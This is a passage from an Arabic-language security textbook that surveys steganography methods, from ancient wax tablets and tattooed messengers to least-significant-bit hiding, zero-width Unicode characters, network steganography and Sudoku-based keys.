‫‪ .frequency domain‬ﻣﺛل ﻣن ﺧﻼل ﻋﻣﻠﯾﺔ ﺿﻐط اﻟﺻور ﻟﻌرﺿﮭﺎ ﻋﻠﻰ اﻟوﯾب‪ ،‬وﺑﻌض ﻣﻧﺎطﻖ اﻟﻌﻣﻠﯾﺎت اﻷﺧرى ﻓﻲ اﻟﺻور‪ .‬وھذا ﯾﺟﻌﻠﮭﺎ‬
‫أﻛﺛر ﺻراﻣﺔ ﺿد اﻟﮭﺟﻣﺎت‪ .‬ﯾﻣﻛن ﺗطﺑﯾﻖ ھذه اﻟﺗﺣوﯾﻼت ﻋﻠﻰ ﻛﺗل ﻣن اﻟﺻور أو ﻋﻠﻰ اﻟﺻورة ﺑﺄﻛﻣﻠﮭﺎ‪.‬‬
‫‪Spread Spectrum Techniques‬‬
‫ھذا اﻷﺳﻠوب ﯾوﻓر اﻟوﺳﯾﻠﺔ ﻟﺗﺿﻌﯾف اﺣﺗﻣﺎل اﻋﺗراض وﻣﻛﺎﻓﺣﺔ اﻟﺗﺷوﯾش ﻋﻠﻰ اﻻﺗﺻﺎﻻت‪ .‬ھذا ھو وﺳﯾﻠﺔ ﻣن وﺳﺎﺋل اﻻﺗﺻﺎل اﻟﺗﻲ ﺗﺳﺗﺧدم‬
‫اﻹﺷﺎرة اﻟزاﺋد ﻣن اﻟﺣد اﻷدﻧﻰ ﻟﻌرض اﻟﻧطﺎق اﻟﺗرددي )‪ (minimum bandwidth‬ﻹرﺳﺎل اﻟﻣﻌﻠوﻣﺎت‪ .‬وﯾﺗم إﻧﺟﺎز اﻧﺗﺷﺎر اﻹﺷﺎرة اﻟزاﺋد‬
‫ﻋن طرﯾﻖ ﻣﺟﻣوﻋﮫ ﻣن اﻷﻛواد )ﻣﺳﺗﻘﻠﺔ ﻣن اﻟﺑﯾﺎﻧﺎت(‪ ،‬وﯾزاﻣن اﻻﺳﺗﻘﺑﺎل ﺑﺎﺳﺗﺧدام اﻷﻛواد اﻟﺗﻲ ﺗﺳﺗﺧدم ﻻﺳﺗرداد اﻟﻣﻌﻠوﻣﺎت ﻣن ﺑﯾﺎﻧﺎت‬
‫‪.Spread Spectrum‬‬
‫اﻟﺘﻘﻨﯿﺎت اﻹﺣﺼﺎﺋﯿﺔ )‪(Statistical Techniques‬‬
‫ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب وﺟود '‪-1‬ﺑت' ﻓﻲ ﻣﺧططﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت)‪ . (steganography schemes‬ﯾﺗﺣﻘﻖ ھذا ﻋن طرﯾﻖ ﺗﻌدﯾل اﻟﻐطﺎء‬
‫ﺑطرﯾﻘﺔ ﻣﺎ ﻋﻧد ﻧﻘل '‪-1‬ﺑت'‪ ،‬ﺑﻌض اﻟﺧﺻﺎﺋص اﻹﺣﺻﺎﺋﯾﺔ ﺗﺗﻐﯾر إﻟﻰ ﺣد ﻛﺑﯾر‪ .‬ﻓﻲ ﺑﻌض اﻟﺣﺎﻻت اﻷﺧرى ﻻ ﯾﺗم ﯾﺗﻐﯾر اﻟﻐطﺎء‪ .‬وﯾﺗم ذﻟك‬
‫ﻟﻠﺗﻣﯾﯾز ﺑﯾن اﻷﻏطﯾﺔ اﻟﻣﻌدﻟﺔ وﻏﯾر اﻟﻣﻌدﻟﺔ‪ .‬ﯾﺳﺗﺧدم ﻟﻼﺳﺗﺧراج اﻟﺑﯾﺎﻧﺎت اﻟﻧظرﯾﺔ اﻟﻔرﺿﯾﺔ )‪ (theory of hypothesis‬ﻣن اﻹﺣﺻﺎء اﻟرﯾﺎﺿﻲ‪.‬‬
‫ﺗﻘﻨﯿﺎت اﻟﺘﺸﻮﯾﮫ )‪(Distortion Techniques‬‬
‫ﻓﻲ ھذا اﻷﺳﻠوب‪ ،‬ﯾﺗم ﺗطﺑﯾﻖ ﺳﻠﺳﻠﺔ ﻣن اﻟﺗﻌدﯾﻼت ﻋﻠﻰ اﻟﻐطﺎء ﺑﻐﯾﺔ اﻟﺣﺻول ﻋﻠﻰ ﻛﺎﺋن ﺳﺗﯾﺟو‪ .‬ﺳﻠﺳﻠﺔ اﻟﺗﻌدﯾﻼت ھذه ﺗﻣﺛل رﺳﺎﻟﺔ ﻣﺣددة ﻟﯾﺗم‬
‫ﻧﻘﻠﮭﺎ‪ .‬ﻋﻣﻠﯾﺔ ﻓك اﻟﺗﺷﻔﯾر ﻓﻲ ھذا اﻷﺳﻠوب ﯾﺗطﻠب اﻟﻣﻌرﻓﺔ ﺣول اﻟﻐطﺎء اﻷﺻﻠﻲ‪ .‬ﻣﺗﻠﻘﻲ اﻟرﺳﺎﻟﺔ ﯾﻣﻛﻧﮫ ﻗﯾﺎس اﻻﺧﺗﻼﻓﺎت ﺑﯾن اﻟﻐﻼف اﻷﺻﻠﻲ‬
‫واﻟﻐﻼف اﻟوارد ﻹﻋﺎدة ﺑﻧﺎء ﺳﻠﺳﻠﺔ اﻟﺗﻌدﯾﻼت )ﻟﺗرﺟﻣﺔ اﻟرﺳﺎﻟﺔ(‪.‬‬
‫‪Cover-generation Techniques‬‬
‫ﻓﻲ ھذه اﻟﺗﻘﻧﯾﺔ‪ ،‬ﯾﺗم ﺗطوﯾر اﻟﻛﺎﺋﻧﺎت اﻟرﻗﻣﯾﺔ ﻟﻐرض ﻛوﻧﮫ ﻏطﺎء ﻟﺳرﯾﺔ اﻻﺗﺻﺎﻻت‪ .‬ﻋﻧدﻣﺎ ﯾﺗم ﺗرﻣﯾز ھذه اﻟﻣﻌﻠوﻣﺎت ﻓﺈﻧﮫ ﯾﺿﻣن ﺧﻠﻖ ﻏطﺎء‬
‫ﻟﻼﺗﺻﺎﻻت اﻟﺳرﯾﺔ‪.‬‬

‫ﯾﻮﺟﺪ ﺗﻘﺴﯿﻢ اﺧﺮ ﻟﺘﻘﻨﯿﺎت إﺧﻔﺎء اﻟﻤﻌﻠﻮﻣﺎت واﻟﺘﻲ ذﻛﺮ ﻣﻦ ﺧﻼل ﻣﻮﻗﻊ وﯾﻜﺒﯿﺪﯾﺎ ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -1‬ﺗﻘﻧﯾﺎت ﻣﺎدﯾﺔ‬
‫اﺳﺗﺧدم إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻋﻠﻰ ﻧطﺎق واﺳﻊ‪ ،‬ﻓﻲ اﻟﻌﺻور اﻟﺗﺎرﯾﺧﯾﺔ اﻟﺣدﯾﺛﺔ وﺣﺗﻰ ﯾوﻣﻧﺎ ھذا‪ .‬وﻣن اﻷﻣﺛﻠﺔ اﻟﻣﻌروﻓﺔ‬
‫اﻟرﺳﺎﺋل ﻣﺧﻔﯾﺔ ﻓﻲ أطﺑﺎق اﻟﺷﻣﻊ "‪"wax tablet‬ﻓﻲ اﻟﻌﺻور اﻟﻘدﯾﻣﺔ‪ ،‬ﻛﺗب اﻟﻧﺎس اﻟرﺳﺎﺋل ﻋﻠﻰ اﻟﺧﺷب ﺛم ﻏطوھﺎ ﺑطﺑﻘﺔ ﻣن اﻟﺷﻣﻊ‪ ،‬ﻛﺗب‬
‫ﻋﻠﯾﮭﺎ رﺳﺎﻟﺔ ﻏﯾر ﻣرﯾﺑﺔ‪.‬‬
‫رﺳﺎﺋل ﺧﻔﯾﺔ ﻋﻠﻰ ﺟﺳم اﻟرﺳول ‪-‬اﺳﺗﺧدﻣت أﯾﺿﺎ ﻓﻲ اﻟﯾوﻧﺎن اﻟﻘدﯾﻣﺔ‪ .‬ھﯾرودوت ﯾﺣﻛﻲ ﻗﺻﺔ رﺳﺎﻟﺔ وﺷم ﻋﻠﻰ رأس رﺟل ﺣﻠﯾﻖ ﻣن ﻋﺑﯾد‬
‫ھﯾﺳﺗﺎ ﯾوس"‪ ، "Histiaeus‬ﻏطﺎھﺎ اﻟﺷﻌر اﻟذي ﻧﻣﺎ ﻓوﻗﮭﺎ ﺑﻌد ذﻟك‪ ،‬وﻛﺷﻔت ﻋﻧد ﺣﻠﻖ اﻟرأس ﻣرة أﺧرى‪ .‬اﻟرﺳﺎﻟﺔ ﺗﺗﺿﻣن ﺗﺣذﯾرا إﻟﻰ‬
‫اﻟﯾوﻧﺎﻧﯾﯾن ﻋن ﺧطط اﻟﻐزو اﻟﻔﺎرﺳﻲ‪ .‬ھذا اﻷﺳﻠوب ﻟﮫ ﻋﯾوب واﺿﺣﺔ‪ ،‬ﻣﺛل ﺗﺄﺧر اﻟﻧﻘل أﺛﻧﺎء اﻧﺗظﺎر ﻧﻣو ﺷﻌر اﻟﻌﺑد‪ ،‬واﻟﻘﯾود اﻟﻣﻔروﺿﺔ ﻋﻠﻰ‬
‫ﻋدد وﺣﺟم اﻟرﺳﺎﺋل اﻟﺗﻲ ﯾﻣﻛن ﺗﺷﻔﯾرھﺎ ﻋﻠﻰ ﻓروة اﻟرأس ﻟﺷﺧص واﺣد‪.‬‬
‫ﻓﻲ اﻷﯾﺎم اﻷوﻟﻰ ﻟﻠﻣطﺎﺑﻊ‪ ،‬ﻛﺎن ﻣن اﻟﺷﺎﺋﻊ ﻣزج اﻟﻣﺣﺎرف )‪ (typefaces‬اﻟﻣﺧﺗﻠﻔﺔ ﻋﻠﻰ اﻟﺻﻔﺣﺔ اﻟﻣطﺑوﻋﺔ اﻟواﺣدة‪ .‬وﯾرﺟﻊ ذﻟك إﻟﻰ ﻋدم‬
‫وﺟود ﻧﺳﺦ ﻛﺎﻓﯾﺔ ﻣن ﺑﻌض اﻟﺣروف ﻟﻠطﺎﺑﻌﺔ‪ .‬وﻟذﻟك‪ ،‬ﯾﻣﻛن أن ﺗﻛﺗب رﺳﺎﻟﺔ ﻣﺧﻔﯾﺔ ﺑﺎﺳﺗﺧدام اﺛﻧﯾن )أو أﻛﺛر( ﻣن اﻟﻣﺣﺎرف اﻟﻣﺧﺗﻠﻔﺔ‪ ،‬ﻣﺛل‬
‫ﻣﺣرف ﻣن اﻟﻧوع اﻟﻌﺎدي أو اﻟﻣﺎﺋل‪.‬‬
‫ﺧﻼل اﻟﺣرب اﻟﻌﺎﻟﻣﯾﺔ اﻟﺛﺎﻧﯾﺔ أرﺳﻠت اﻟﻣﻘﺎوﻣﺔ اﻟﻔرﻧﺳﯾﺔ ﺑﻌض اﻟرﺳﺎﺋل اﻟﻣﻛﺗوﺑﺔ ﻋﻠﻰ ظﮭر ﺳﻌﺎة ﺑﺎﺳﺗﺧدام ﺣﺑر ﺧﻔﻲ‪ .‬رﺳﺎﺋل ﻣﺧﻔﯾﺔ ﻓﻲ ورﻗﺔ‬
‫ﻣﻛﺗوﺑﺔ ﺑﺎﺳﺗﺧدام ﺣﺑر ﺧﻔﻲ‪ ،‬ﺗﺣت رﺳﺎﺋل أﺧرى أو ﻋﻠﻰ أﺟزاء ﻓﺎرﻏﺔ ﻣن اﻟرﺳﺎﺋل اﻷﺧرى‪ .‬رﺳﺎﺋل ﻣﻛﺗوﺑﺔ ﺑﺷﻔرة ﻣورس ﺑﺣﯾﺎﻛﺔ ﻏزل ﺛم‬
‫ﺧﯾطت‪ ،‬اﻟﻘطﻌﺔ اﻟﻣﺣﺎﻛﺔ‪ ،‬ﻓﻲ ﻗطﻌﺔ ﻣن اﻟﻣﻼﺑس اﻟﺗﻲ ﯾرﺗدﯾﮭﺎ اﻟﺳﺎﻋﻲ‪.‬‬
‫‪ -2‬ﺗﻘﻧﯾﺎت رﻗﻣﯾﺔ‬
‫دﺧﻠت ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺣدﯾﺛﺔ ﻓﻲ ﺳﻧﺔ ‪ 1985‬ﻣﻊ ظﮭور اﻟﺣواﺳﯾب اﻟﺷﺧﺻﯾﺔ‪ ،‬وﺟرى ﺗطﺑﯾﻖ ﻣﺷﺎﻛل إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻘﻠﯾدﯾﺔ‬
‫ﻋﻠﯾﮭﺎ‪ .‬إن اﻟﺗطور اﻟذي أﻋﻘب ذﻟك ﻛﺎن ﺑطﯾﺋﺎ‪ ،‬وﻟﻛن ﻣﻧذ اﻧطﻼﻗﮭﺎ‪ ،‬ﺗﻌﺎظم ﺣﺟم ﺑرﻣﺟﯾﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﻣﺗﺎﺣﺔ‪.‬‬
‫إﺧﻔﺎء اﻟرﺳﺎﺋل ﺑﺗﺿﻣﯾﻧﮭﺎ ﻓﻲ اﻟﺑﺗﺎت اﻷﻗل أھﻣﯾﺔ ﻟﻠﺻور اﻟﻣﺷوﺷﺔ أو ﻣﻠﻔﺎت اﻟﺻوت‪.‬‬
‫إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ﺿﻣن ﺑﯾﺎﻧﺎت ﻣﺷﻔرة أو ﺿﻣن ﺑﯾﺎﻧﺎت ﻋﺷواﺋﯾﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪460‬‬

‫ﺗﺷﻔر اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾراد اﺧﻔﺎؤھﺎ‪ ،‬ﻗﺑل اﺳﺗﺧداﻣﮭﺎ ﻟﻠﻛﺗﺎﺑﺔ ﻓوق ﺟزء ﻣن ﻛﺗﻠﺔ أﻛﺑر ﺑﻛﺛﯾر ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﻣﺷﻔرة أو ﻛﺗﻠﺔ ﻣن اﻟﺑﯾﺎﻧﺎت‬
‫اﻟﻌﺷواﺋﯾﺔ( اﻟﺷﻔرات اﻟﻐﯾر ﻗﺎﺑﻠﺔ ﻟﻠﻛﺳر ﻣﺛل ﻟوﺣﺔ اﻟﻣرة اﻟواﺣدة ‪ One-time pad‬ﺗوﻟد ﻧﺻوص ﻣﺷﻔرة‪ ،‬ﺗﺑدو ﻋﺷواﺋﯾﺔ ﺗﻣﺎﻣﺎ إذا ﻛﺎن اﻟﻣﮭﺎﺟم‬
‫ﻻ ﯾﻣﻠك اﻟﻣﻔﺗﺎح اﻟﺧﺎص)"‪. ("private key‬‬
‫اﻹﺧﻔﺎء ﺑﺗﻌدﯾل اﻟﺻدى ﻓﻲ ﻣﻠف اﻟﺻوت‪.‬‬
‫اﻹﺧﻔﺎء اﻵﻣن ﻓﻲ اﻹﺷﺎرات اﻟﺻوﺗﯾﺔ‪.‬‬
‫اﻹﺧﻔﺎء ﺑﺗﻌدﯾل اﻟﺻدى ﻓﻲ ﻣﻠف اﻟﺻوت‪.‬‬
‫ﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت ﻓﻲ أﻗﺳﺎم ﻣﮭﻣﻠﺔ ﻣن اﻟﻣﻠف‪ ،‬ﻣﺛل ﺑﻌد ﻧﮭﺎﯾﺔ ﺳطر ﻣرﺋﻲ ﻟﻣﻠف اﻟﻧﺎﻗل‪.‬‬
‫ﺟﻌل اﻟﻧص ﺑﻧﻔس ﻟون اﻟﺧﻠﻔﯾﺔ ﻓﻲ وﺛﺎﺋﻖ ﻣﻌﺎﻟﺞ اﻟﻛﻠﻣﺎت‪ ،‬ورﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬واﻟﻣﺷﺎرﻛﺎت ﻓﻲ اﻟﻣﻧﺗدى‪.‬‬
‫‪ -3‬ﺗﻘﻧﯾﺎت ﺷﺑﻛﯾﺔ‬
‫ﺟﻣﯾﻊ ﺗﻘﻧﯾﺎت ﺗﺑﺎدل ﻣﻘﺎطﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧﻔﯾﺔ "‪ "steganogram‬اﻟﺗﻲ ﯾﻣﻛن ﺗﺑﺎدﻟﮭﺎ ﻓﻲ ﺷﺑﻛﺎت اﻻﺗﺻﺎل اﻟﺳﻠﻛﻲ واﻟﻼﺳﻠﻛﻲ‪ ،‬ﺗﺳﻣﻰ ﺑﺎﻹﺧﻔﺎء‬
‫اﻟﺷﺑﻛﻲ”‪ . "network steganography‬اول اﺳﺗﺧدام ﻟﮭذه اﻟﺗﺳﻣﯾﺔ ﻛﺎن ﻣن ﻗﺑل "ﻛرﯾﺳﺗوف ﺷﯾﺑﯾورﺳﻛﻲ ﺳﻧﺔ ‪ .2003‬ﺑﺎﻟﺗﻘﺎﺑل ﻣﻊ اﻷﺳﺎﻟﯾب‬
‫اﻟﺗﻘﻠﯾدﯾﺔ اﻟﺗﻲ ﺗﺳﺗﺧدم اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟوﺳﺎﺋط اﻟرﻗﻣﯾﺔ )ﻣﻠﻔﺎت اﻟﺻور واﻟﺻوت واﻟﻔﯾدﯾو( ﻛﻐطﺎء ﻟﻠﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ‪ ،‬ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺷﺑﻛﺔ‬
‫ﯾﺳﺗﺧدم ﻋﻧﺎﺻر اﻟﺗﺣﻛم ﻟﺑروﺗوﻛوﻻت اﻻﺗﺻﺎﻻت واﻟوظﺎﺋف اﻟﺟوھرﯾﺔ اﻷﺳﺎﺳﯾﺔ‪ .‬وﻧﺗﯾﺟﺔ ﻟذﻟك‪ ،‬ھذه اﻷﺳﺎﻟﯾب ھﻲ أﺻﻌب ﻓﻲ اﻟﻛﺷف ﻋﻧﮭﺎ‬
‫واﻟﻘﺿﺎء ﻋﻠﯾﮭﺎ‪ .‬ﺗﻧطوي أﺳﺎﻟﯾب ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺷﺑﻛﺔ اﻟﻧﻣوذﺟﯾﺔ ﻋﻠﻰ ﺗﻌدﯾل ﺧﺻﺎﺋص ﺑروﺗوﻛول ﺷﺑﻛﺔ اﺗﺻﺎل واﺣد‪ .‬وﯾﻣﻛن ﺗطﺑﯾﻖ ھذا‬
‫اﻟﺗﻌدﯾل إﻟﻰ)‪) PDU (Protocol Data Unit‬وﺣدة ﺑﯾﺎﻧﺎت اﻟﺑروﺗوﻛول(‪ .‬ﻋﻼوة ﻋﻠﻰ ذﻟك‪ ،‬ﻓﻣن اﻟﻣﻣﻛن اﻻﺳﺗﻔﺎدة ﻣن اﻟﻌﻼﻗﺔ ﺑﯾن اﺛﻧﯾن أو‬
‫أﻛﺛر ﻣن ﺑروﺗوﻛوﻻت اﻟﺷﺑﻛﺔ اﻟﻣﺧﺗﻠﻔﺔ ﻟﺗﻣﻛﯾن اﻻﺗﺻﺎﻻت اﻟﺳرﯾﺔ‪ .‬ﺗﻘﻊ ھذه اﻟﺗطﺑﯾﻘﺎت ﺗﺣت ﻣﺻطﻠﺢ)‪.(inter-protocol steganography‬‬
‫ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺷﺑﻛﺔ ﯾﻐطﻲ طﺎﺋﻔﺔ واﺳﻌﺔ ﻣن اﻟﺗﻘﻧﯾﺎت‪ ،‬واﻟﺗﻲ ﺗﺷﻣل‪:‬‬
‫ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ‪-‬إﺧﻔﺎء اﻟرﺳﺎﺋل ﻓﻲ ﻣﺣﺎدﺛﺎت)‪. (Voice-over-IP‬‬
‫ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺷﺑﻛﺎت اﻟﻣﺣﻠﯾﺔ اﻟﻼﺳﻠﻛﯾﺔ ‪- WAN‬ﺑﺎﻻﺳﺗﻔﺎدة ﻣن اﻷﺳﺎﻟﯾب اﻟﺗﻲ ﯾﻣﻛن أن ﺗﻣﺎرس ﻟﻧﻘل اﻟﻣﻘﺎطﻊ اﻟﻣﺧﻔﯾﺔ ﻓﻲ‬
‫اﻟﺷﺑﻛﺎت اﻟﻼﺳﻠﻛﯾﺔ اﻟﻣﺣﻠﯾﺔ‪.‬‬
‫‪ -4‬ﺗﻘﻧﯾﺎت ﻣطﺑوﻋﺔ‬
‫اﺧرج اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟرﻗﻣﻲ ﻗد ﯾﻛون ﻓﻲ ﺷﻛل وﺛﺎﺋﻖ ﻣطﺑوﻋﺔ‪ .‬ﻗد ﺗﺷﻔر رﺳﺎﻟﺔ‪) ،‬ﻧص ﺻرﯾﺢ ‪ ،(plaintext‬أوﻻ‪ ،‬ﺑﺎﻟوﺳﺎﺋل اﻟﺗﻘﻠﯾدﯾﺔ‪،‬‬
‫ﻹﻧﺗﺎج اﻟﻧص اﻟﻣﺷﻔر ‪ .ciphertext‬ﺛم‪ ،‬ﯾﺗم ﺗﻌدﯾل ﻏطﺎء ﻏﯾر ﻣرﯾب )‪ (cover text‬ﺑطرﯾﻘﺔ ﻣﺎ‪ ،‬ﻻﺣﺗواء اﻟﻧص اﻟﻣﺷﻔر‪ ،‬ﻓﯾﻧﺗﺞ اﻟﻧص‬
‫اﻟﺣﺎوي ﻟﻠرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ )‪ .(stegotext‬اﻟﻧص اﻟﻣﺷﻔر اﻟذي ﺗﻧﺗﺟﮫ أﻛﺛر وﺳﺎﺋل إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟرﻗﻣﯾﺔ‪ ،‬ﻟﯾﺳت ﻗﺎﺑﻠﺔ ﻟﻠطﺑﺎﻋﺔ‪ .‬اﻷﺳﺎﻟﯾب‬
‫اﻟرﻗﻣﯾﺔ اﻟﺗﻘﻠﯾدﯾﺔ ﺗﻌﺗﻣد ﻋﻠﻰ اﺣداث ﺗﻐﯾﯾر اﻟﺿوﺿﺎء )‪(noise‬ﻓﻲ اﻟﻣﻠف اﻟﻘﻧﺎة ﻹﺧﻔﺎء اﻟرﺳﺎﻟﺔ‪ ،‬ﻋﻠﻰ ھذا اﻟﻧﺣو‪ ،‬ﯾﺟب أن ﯾرﺳل اﻟﻣﻠف إﻟﻰ ﻗﻧﺎة‬
‫اﻟﻣﺗﻠﻘﻲ دون إﺣداث ﺿوﺿﺎء إﺿﺎﻓﯾﺔ ﻧﺗﯾﺟﺔ اﻻرﺳﺎل‪ .‬اﻟطﺑﺎﻋﺔ اﻟﺗﻲ ﺗﻧﺗﺞ اﻟﻛﺛﯾر ﻣن اﻟﺿوﺿﺎء ﻓﻲ اﻟﻧص اﻟﻣﺷﻔر‪ ،‬ﺗﺟﻌل اﻟرﺳﺎﻟﺔ‪ ،‬ﻋﻣوﻣﺎ‪ ،‬ﻏﯾر‬
‫ﻗﺎﺑﻠﺔ ﻟﻼﺳﺗرداد‪ .‬ھﻧﺎك ﺗﻘﻧﯾﺎت اﻟﺗﻲ ﺗﺗﻧﺎول ھذا اﻟﻘﯾد‪ ،‬ﻣﺛﺎل ھو )‪.(ASCII Art Steganography‬‬
‫‪ -5‬اﻟﻧص اﻟرﻗﻣﻲ‬
‫ﯾﺳﺗﺧدم ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪-‬ﯾوﻧﯾﻛود ﺣروﻓﺎ ﺗﺷﺑﮫ ﻣﺟﻣوﻋﺔ ‪ ASCII‬اﻟﻣﻌﺗﺎدة ﻟﺗﺑدو طﺑﯾﻌﯾﺔ‪ ،‬ﻓﻲ ﺣﯾن أﻧﮭﺎ ﺗﺣﻣل ﺑﺗﺎت إﺿﺎﻓﯾﺔ ﻣن اﻟﻣﻌﻠوﻣﺎت‪ .‬إذا‬
‫ﻋرض اﻟﻧص ﺑﺷﻛل ﺻﺣﯾﺢ‪ ،‬ﻓﻠن ﯾﻛون ھﻧﺎك ﻓرق ﺑﺻري ﻋن اﻟﻧص اﻟﻌﺎدي‪ .‬وﻣﻊ ذﻟك‪ ،‬ﺑﻌض اﻷﻧظﻣﺔ‪ ،‬ﻗد ﺗﻌرض اﻟﺧطوط ﺑﺷﻛل ﻣﺧﺗﻠف‪،‬‬
‫وﺳﯾﺗم رﺻد اﻟﻣﻌﻠوﻣﺎت اﻻﺿﺎﻓﯾﺔ ﺑﺳﮭوﻟﺔ‪ .‬ﻣن ﺟﮭﺔ أﺧرى‪ ،‬اﻟﺣروف اﻟﻣﺧﻔﯾﺔ )ﻣﺛﻼ‪ ،‬ﺣروف اﻟﺳﯾطرة(‪ ،‬اﻻﺳﺗﺧدام اﻟﻣﺗﻛرر ﻟﻠﻌﻼﻣﺎت )ﻧوع‬
‫اﻟﺣروف اﻟﻐﺎﻣﻖ‪ ،‬اﻟﻣﺳطر‪ ،‬واﻟﻣﺎﺋل‪ ،‬اﻟﺗﺷﻛﯾل ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﺣروف اﻟﻌرﺑﯾﺔ(‪ ،‬ﯾﻣﻛن ان ﺗﺿﯾف ﻣﻌﻠوﻣﺎت ﺧﻔﯾﺔ ﻓﻲ ﻣﺗن اﻟﻧص‪ ،‬ﺑدون ان ﺗﺑدو‬
‫واﺿﺣﺔ ﺑﺻرﯾﺎ ﻋﻧد ﻋرﺿﮭﺎ‪ ،‬وﻟﻛن ﯾﻣﻛن اﻛﺗﺷﺎﻓﮭﺎ ﻋﻧد اﻻطﻼع ﻋﻠﻰ ﺷﻔرة ﻣﺻدر اﻟوﺛﯾﻘﺔ‪.‬‬
‫ﯾﻣﻛن ان ﺗﺣﺗوي ﺻﻔﺣﺎت )‪ ،(HTML‬ﻋﻠﻰ ﺗﻌﻠﯾﻣﺎت ﺑرﻣﺟﯾﺔ ذات ﻣﺳﺎﻓﺎت ﻓﺎرﻏﺔ )‪ (blank spaces‬إﺿﺎﻓﯾﺔ وﻋﻼﻣﺎت اﻟﺗﺑوﯾب ﻓﻲ ﻧﮭﺎﯾﺔ‬
‫اﻷﺳطر‪ ،‬وﻛذﻟك أﻟوان ﻣﺧﺗﻠﻔﺔ‪ ،‬واﻟﺧطوط واﻷﺣﺟﺎم‪ ،‬واﻟﺗﻲ ﻟن ﺗﻛون ﻣرﺋﯾﺔ ﻋﻧد ﻋرﺿﮭﺎ‪ .‬وھﻧﺎك ﻣﺛﺎل أﻛﺛر ﺑﺳﺎطﺔ ھو ﻧص أﺑﯾض ﻋﻠﻰ ﺧﻠﻔﯾﺔ‬
‫ﺑﯾﺿﺎء‪ ،‬واﻟﺗﻲ ﯾﻣﻛن أن ﯾﻛﺷف ﻋﻧد ﺑﺗﺣدﯾده‪"selecting”.‬‬
‫أﺣد ھذه اﻷﺳﺎﻟﯾب ﯾﺳﺗﻧد إﻟﻰ اﺳﺗﺧدام ﺣروف ﯾوﻧﯾﻛود اﻟﻐﯾر ﻗﺎﺑﻠﮫ ﻟﻠطﺑﺎﻋﯾﺔ)‪، ((ZWJ)zero-width-joiner)، (non-printing‬‬
‫)‪ .(ZWNJ) (zero-width non-joiner‬وﺗﺳﺗﺧدم ھذه اﻷﺣرف ﻟوﺻل وﻓﺻل اﻟﺣروف ﻓﻲ اﻟﻠﻐﺔ اﻟﻌرﺑﯾﺔ‪ ،‬وﻟﻛن ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻓﻲ‬
‫اﻟﺣروف اﻟﮭﺟﺎﺋﯾﺔ اﻟروﻣﺎﻧﯾﺔ ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻷﻧﮭﺎ ﻻ ﻣﻌﻧﻰ ﻟﮭﺎ ﻓﻲ اﻷﺑﺟدﯾﺔ اﻟﻼﺗﯾﻧﯾﺔ‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﻻ ﯾﺗم ﻋرﺿﮭﺎ‪.‬‬
‫‪ -6‬اﺳﺗﺧدام أﻟﻐﺎز ﺳودوﻛو‬
‫ﻓن إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ﻓﻲ ﺻورة ﺑﺎﺳﺗﺧدام أﻟﻐﺎز ﺳودوﻛو‪ ،”Sudoku puzzle"،‬واﻟذي ﯾﺳﺗﺧدم ﻛﻣﻔﺗﺎح ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت داﺧل ﺻورة‪ .‬إﺧﻔﺎء‬
‫اﻟﻣﻌﻠوﻣﺎت ﺑﺎﺳﺗﺧدام اﻷﻟﻐﺎز ﺳودوﻛو ﯾﻣﺗﻠك اﻟﻌدﯾد ﻣن اﻟﻣﻔﺎﺗﯾﺢ ﺑﻘدر اﻟﺣﻠول اﻟﻣﻣﻛﻧﺔ ﻟﻠﻐز ﺳودوﻛو‪ ،‬واﻟذي ھو ‪ .1021 × 6.71‬وھذا ﯾﻌﺎدل‬
‫ﺣواﻟﻲ ‪ 70‬ﺑت‪ ،‬ﻣﻣﺎ ﯾﺟﻌﻠﮭﺎ أﻗوى ﺑﻛﺛﯾر ﻣن طرﯾﻘﺔ ‪ DES‬اﻟذي ﯾﺳﺗﺧدم ﻣﻔﺗﺎح ‪ 56‬ﺑت‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪461‬‬

‫‪HOW STEGANOGRAPHY WORKS‬‬

‫ﺗﺷﻔﯾر ‪ Steganography‬ﯾﺳﺗﺧدم اﻷﻣﺎﻛن اﻷﻗل أھﻣﯾﺔ ﻣن اﻟﻣﺣﺗوى اﻟرﻗﻣﻲ‪ ،‬وﯾﻘﺣم اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ ﻓﻲ ﻣﻛﺎﻧﮭﺎ‪ .‬ﯾﺗم ذﻟك ﻋﺑر ﻣﻠﻔﺎت اﻟﺻور‬
